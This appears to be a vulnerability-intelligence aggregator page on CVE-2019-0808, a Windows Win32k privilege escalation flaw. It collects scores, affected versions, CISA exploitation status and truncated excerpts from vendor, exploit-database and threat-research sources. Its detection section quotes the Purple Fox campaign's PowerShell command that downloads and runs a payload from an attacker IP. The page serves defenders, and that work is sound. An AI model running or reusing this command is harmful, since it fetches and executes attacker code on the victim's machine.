CVE-2019-0808
published 2019-04-09CVE-2019-0808: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of…
PriorityP184high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
53.30%
98.9th percentile
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
| msrc | windows_7_for_32-bit_systems_service_pack_1 | — | — |
| msrc | windows_7_for_x64-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_itanium-based_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_x64-based_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_r2_for_itanium-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_r2_for_x64-based_systems_service_pack_1 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcmd.exe /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://103.228.112.246:17881/57BC9B7E.Png');MsiMake hxxp://103.228.112.246:17881/0CFA042F.Png"↗
- →CVE-2019-0808 exploit binary compiled on 10 September 2020; PDB path reveals it was sourced from a public GitHub repository named CVE-2019-0808 ↗
- →CVE-2019-0808 is targeted specifically against Windows 7 / Windows Server 2008 systems missing KB4489878, KB4489885, or KB2882822; check for absence of these hotfixes as a detection signal ↗
- →Purple Fox payload uses steganography to embed LPE exploit binaries inside image files (key=3 & key=4); detect by inspecting pixel-level LSB encoding in downloaded images combined with IEX execution ↗
- →Purple Fox MSI drops a VMProtect-protected DLL; PE section names starting with '.vmp' indicate VMProtect packing and should be flagged during file scanning ↗
- ·CVE-2019-0808 exploitation in the PurpleFox context targets only Windows 7 / Windows Server 2008 (64-bit); the exploit bundle script checks the OS version before selecting this CVE ↗
- ·The exploit code for CVE-2019-0808 used by Purple Fox was sourced from a publicly available GitHub repository, meaning the binary may vary across actors who recompile it ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Win32k Privilege Escalation Vulnerability
cisa·2021-11-03·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Win32k Privilege Escalation Vulnerability
Vulnerability: Microsoft Win32k Privilege Escalation Vulnerability
Affected: Microsoft Win32k
Microsoft Win32k contains a privilege escalation vulnerability due to the component failing to properly handle objects in memory. Successful exploitation allows an attacker to run code in kernel mode.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-0808
Remediation Due Date: 2022-05-03
Microsoft
Win32k Elevation of Privilege Vulnerability
vendor_msrc·2019-03-12·CVSS 7.0
CVE-2019-0808 [HIGH] Win32k Elevation of Privilege Vulnerability
Win32k Elevation of Privilege Vulnerability
Description: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.
The update addresses this vulnerability by correcting how Win32k handles objects in memory.
Microsoft Graphics Component: Microsoft Graphics Component
Impact: Elevation of Pri
GHSA
GHSA-8wc3-99q7-2qvc: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2019-0808 [HIGH] GHSA-8wc3-99q7-2qvc: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.
GHSA
GHSA-74qg-858w-vpcj: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2019-0797 [HIGH] GHSA-74qg-858w-vpcj: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0808.
Project0
Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019 - Project Zero
project_zero·2020-07-01
CVE-2016-5195 Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019 - Project Zero
Posted by Maddie Stone, Project Zero
In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019.
When I had the idea for this “Year in Review” blog post, I immedi
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck·2019·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k contains a privilege escalation vulnerability due to the component failing to properly handle objects in memory. Successful exploitation allows an attacker to run code in kernel mode.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2019-Mar; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.niiconsulting.com/Security_Advisories/Security_Advisory_Digest_April_edition_1_digest_pdf.pdf; https://www.sentinelone.com/labs/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/; https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-
No detection rules found.
Exploit-DB
Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
exploitdb·2019-03-26·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
---
# Exploit Title: Microsoft Windows Win32k CVE-2019-0808 Local Privilege Escalation Vulnerability
# Date: 24/03/2019
# Exploit Author: ze0r
# Vendor Homepage: www.microsoft.com
# Version: Microsoft Windows 7/ Server 2008
# CVE : CVE-2019-0808
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46604.zip
Metasploit
Microsoft Windows NtUserMNDragOver Local Privilege Elevation
metasploit
Microsoft Windows NtUserMNDragOver Local Privilege Elevation
Microsoft Windows NtUserMNDragOver Local Privilege Elevation
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call. The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not effectively check the validity of the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), where the NULL pointer dereference will occur. This module has been tested against Windows 7 x86 SP0 and SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Ciberamenazas
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new b
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy 2021/10/19 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new bac
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
# PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy
2021/10/19
Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new bac
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new b
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyberbedrohungen
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a ne
Sentinelone
Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
blogs_sentinelone·2020-10-19·CVSS 7.8
CVE-2020-1054 [HIGH] Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
## Executive Summary
- In recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet Explorer by actors leveraging the Purple Fox exploit kit.
- Our investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054 and CVE-2019-0808 – through publicly-available exploit code.
- In addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall protections and some detection tools by adopting steganography and obscuring malicious code with code virtualization technologies.
During the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in September 2018, subsequent researchers noted that in 2019 Purple Fox dropped use of NSIS (Null
Sentinelone
Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
blogs_sentinelone·2020-10-19·CVSS 7.8
CVE-2020-1054 [HIGH] Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
## Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
## Executive Summary
In recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet Explorer by actors leveraging the Purple Fox exploit kit.
Our investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054 and CVE-2019-0808 – through publicly-available exploit code.
In addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall protections and some detection tools by adopting steganography and obscuring malicious code with code virtualization technologies.
During the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in September 201
Tenable
CVE-2020-0674: Internet Explorer Remote Code Execution Vulnerability Exploited in the Wild
blogs_tenable·2020-01-20·CVSS 7.5
[HIGH] CVE-2020-0674: Internet Explorer Remote Code Execution Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2019-1367: Critical Internet Explorer Memory Corruption Vulnerability Exploited In The Wild
blogs_tenable·2019-09-23·CVSS 7.5
[HIGH] CVE-2019-1367: Critical Internet Explorer Memory Corruption Vulnerability Exploited In The Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Krebs
Patch Tuesday, March 2019 Edition
blogs_krebs·2019-03-13·CVSS 7.8
CVE-2019-0808 [HIGH] Patch Tuesday, March 2019 Edition
Microsoft on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its Windows operating systems, Internet Explorer, Edge, Office and Sharepoint. If you (ab)use Microsoft products, it’s time once again to start thinking about getting your patches on. Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today’s patch batch without any help from users.
Microsoft also addressed a zero day flaw (CVE-2019-0808) in Windows 7 and Windows Server 2008 that’s been abused in conjunction with a previously unknown weakness (CVE-2019-5786) in Google’s Chrome browser. A security alert from Google last week said attackers were chaining the Windows and Chrome vulnerabilities to drop malicious code onto vulnerable systems.
If you use Chro
Krebs
Patch Tuesday, March 2019 Edition
blogs_krebs·2019-03-13·CVSS 7.8
[HIGH] Patch Tuesday, March 2019 Edition
Microsoft on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its Windows operating systems, Internet Explorer , Edge , Office and Sharepoint . If you (ab)use Microsoft products, it’s time once again to start thinking about getting your patches on. Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today’s patch batch without any help from users.
One interesting patch from Microsoft this week comes in response to a zero-day vulnerability ( CVE-2019-0797 ) reported by researchers at Kaspersky Lab, who discovered the bug could be (and is being) exploited to install malicious software.
Microsoft also addressed a zero day flaw ( CVE-2019-0808 ) in Windows 7 and Windows Server 2008 that’s been abused in conjunction wit
Tenable
Use-After-Free Vulnerability in Google Chrome Exploited In The Wild (CVE-2019-5786)
blogs_tenable·2019-03-06·CVSS 6.5
[MEDIUM] Use-After-Free Vulnerability in Google Chrome Exploited In The Wild (CVE-2019-5786)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Zscaler
Zscaler found Multiple Security Vulnerabilities | 03-12-201
blogs_zscaler·CVSS 7.5
[HIGH] Zscaler found Multiple Security Vulnerabilities | 03-12-201
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://packetstormsecurity.com/files/157616/Microsoft-Windows-NtUserMNDragOver-Local-Privilege-Escalation.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808http://packetstormsecurity.com/files/157616/Microsoft-Windows-NtUserMNDragOver-Local-Privilege-Escalation.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-0808
2019-04-09
Published
2021-11-03
Added to CISA KEV
Exploited in the wild